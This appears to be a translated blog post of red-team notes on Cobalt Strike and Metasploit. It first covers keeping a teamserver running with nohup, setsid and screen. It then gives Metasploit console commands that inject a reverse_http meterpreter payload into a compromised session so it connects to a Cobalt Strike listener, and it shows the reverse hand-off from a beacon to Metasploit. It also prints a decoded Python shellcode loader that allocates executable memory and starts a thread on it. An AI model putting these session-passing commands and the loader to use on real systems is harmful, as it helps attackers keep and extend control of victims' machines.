Cobalt Strike (CS) has long been a powerful C2 framework, and I used it together with MSF with good results. Then it sat unused for a long time and was forgotten. Seeing it come up again, here is a collection of notes.
Cobaltstrike teamserver persistence
When we operate from a terminal, the teamserver is a child process of the SSH session. When SSH is interrupted or the network connection is lost, the terminal sends a HUP (hangup) signal that closes all of its child processes. To keep the Cobalt Strike teamserver alive we need to do one of two things:
- make the process ignore the HUP signal;
- run the process in a new session, so that it is no longer a child process belonging to this terminal.
The first idea is usually implemented with the nohup command; appending & to the command line runs it in the background:
[root@Fazx ~]# nohup ping 0sec.com.cn &
[1] 3059
nohup: appending output to `nohup.out'
[root@Fazx ~]# ps -ef | grep 3059
root 3059 984 0 21:06 pts/3 00:00:00 ping 0sec.com.cn
The second idea corresponds to the setsid command:
[root@Fazx ~]# setsid ping 0sec.com.cn
[root@Fazx ~]# ps -ef | grep 0sec.com.cn
root 31094 1 0 20:28 ? 00:00:00 ping 0sec.com.cn
The process ID (PID) is 31094 and its parent process ID (PPID) is 1 (the init process); the TTY column shows ?, meaning the process has no controlling terminal.
In addition, running the command with & inside a subshell, ( ... ), achieves the same effect as setsid:
[root@Fazx ~]# (ping 0sec.com.cn &)
[root@Fazx ~]# ps -ef | grep 0sec.com.cn
root 3998 1 0 20:37 pts/4 00:00:00 ping 0sec.com.cn
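The three variants above (plain &, nohup and setsid) can be compared directly in a few lines of Python. This is an added example and not code from the original post: it uses subprocess.Popen's start_new_session option (which calls setsid() in the child, as the setsid command does) and a preexec_fn that sets SIGHUP to SIG_IGN (which is what nohup does), with sleep standing in for the teamserver process.

```python
import os
import signal
import subprocess


def spawn_child(ignore_hup=False, new_session=False):
    """Start a long-running child process with the chosen protection.

    ignore_hup  reproduces what nohup does: SIGHUP is set to SIG_IGN before
                exec, and that disposition survives the exec of `sleep`.
    new_session reproduces what setsid does: the child calls setsid() and
                becomes leader of a new session with no controlling terminal.
    """
    def prepare():
        if ignore_hup:
            signal.signal(signal.SIGHUP, signal.SIG_IGN)

    return subprocess.Popen(
        ["sleep", "60"],                 # stand-in for the teamserver
        preexec_fn=prepare,
        start_new_session=new_session,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )


def survives_hangup(proc, grace=1.0):
    """Deliver SIGHUP directly to the child and report whether it keeps running."""
    os.kill(proc.pid, signal.SIGHUP)
    try:
        proc.wait(timeout=grace)
        return False          # exited: the default SIGHUP action terminated it
    except subprocess.TimeoutExpired:
        return True           # still alive after the signal


def is_session_leader(proc):
    """True when the child heads its own session, i.e. setsid() took effect."""
    return os.getsid(proc.pid) == proc.pid


def reap(proc):
    """Make sure no stray sleep processes are left behind."""
    if proc.poll() is None:
        proc.kill()
    proc.wait()


def compare_strategies():
    """Run the three variants discussed above and record what each achieves."""
    variants = {
        "plain": {},
        "nohup_like": {"ignore_hup": True},
        "setsid_like": {"new_session": True},
    }
    results = {}
    for name, kwargs in variants.items():
        proc = spawn_child(**kwargs)
        results[name] = {
            "own_session": is_session_leader(proc),
            "survives_hup": survives_hangup(proc),
        }
        reap(proc)
    return results


if __name__ == "__main__":
    for name, outcome in compare_strategies().items():
        print(f"{name:12s} own_session={outcome['own_session']} "
              f"survives_hup={outcome['survives_hup']}")
```

The result for setsid_like is instructive: it heads its own session (so the terminal never sends it a HUP when the SSH connection drops), but a HUP delivered explicitly with kill still terminates it, because setsid changes who signals the process, not how it reacts. The nohup_like variant is the reverse. A tool such as screen, or a proper service manager, gives you both properties at once.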
To avoid repeating the command many times, or forgetting to add it for some command, this article recommends the screen tool. It conveniently simulates multiple terminal windows, and every process started inside it is reparented under init (idea 2 above). In short, from an operational point of view:
# install screen first
apt-get install screen
Run screen to open a new window and enter commands in it as usual. When finished, press Ctrl+A then D to detach the window into the background; the session is then shown in the Detached state.
Use screen -ls to list the background windows and screen -r ID to restore the specified session:
screen -r 14662
Likewise, a Metasploit handler listening on a port and waiting for a reverse shell can be kept alive in the same way, which is much more convenient than nohup.
MSF: spawn a shell to Cobalt Strike
After obtaining an MSF shell and establishing a session, run background in meterpreter to put the session in the background, then switch payload.
The attacking machine running MSF has Cobalt Strike installed; the teamserver does not need to be on the same host, as long as the port is reachable for remote communication the shell can be spawned.
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST [listener IP]
msf exploit(payload_inject) > set LPORT [listener port]
msf exploit(payload_inject) > set SESSION [session ID]
msf exploit(payload_inject) > exploit
DisablePayloadHandler is set to true because payload_inject would otherwise start a new handler locally after execution; we already have a listener, so there is no need to generate another.
When there are multiple sessions, list all of them and check the options to choose which session to spawn the shell from:
The CS listener is configured as follows:
windows/beacon_http/reverse_http
The compromised host then checks in successfully on the CS side:
Cobalt Strike: spawn a shell to MSF
After obtaining a beacon shell in CS, configure a listener of type
windows/foreign/reverse_tcp
Note that on the MSF side the configuration remains windows/meterpreter/reverse_tcp: the listener here is reverse_tcp, not reverse_http, and the IP and port configured must match what MSF is listening on.
MSF must have exploit/multi/handler set up in advance to listen for the reverse TCP connection; this step is routine and is not repeated here. Right-click the target you want to spawn from, choose Spawn, then select the corresponding listener.
On the other end, MSF receives the connection and obtains a Meterpreter session:
Afterword
When do we need to spawn a shell? First, although the CS modules used for the initial attack are powerful, they are not as rich as MSF's and there is less reference material, so at that point MSF needs to take over the shell for the subsequent post-exploitation process. Second, the CS beacon mainly supports the Windows platform and its payloads are also for Windows, as can be seen from the Python payload generated by CS's Scripted Web Delivery, shown below after decoding (shellcode omitted):
import ctypes
import platform
(arch, type) = platform.architecture()
# 32-bit Python
if arch == "32bit":
shellcode = "xxxx"
# 64-bit Python
elif arch == "64bit":
shellcode = "xxxx"
else:
shellcode = ""
# sanity check our situation
if type != "WindowsPE" or len(shellcode) == 0:
quit()
# inject our shellcode
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
As you can see, the payload code checks for WindowsPE, so it can only directly obtain a Windows shell. By spawning a shell, however, we can use MSF's Linux payloads, obtain Linux access and then hand it over to the CS platform, broadening and deepening collaborative team penetration testing.
Cobalt Strike's core functionality remains the post-exploitation phase: AV evasion, lateral movement inside the intranet, internal forwarding, C2 profiles and so on; subsequent articles will cover these topics.
At the time of writing it was Halloween, and Metasploit had also changed its theme banner: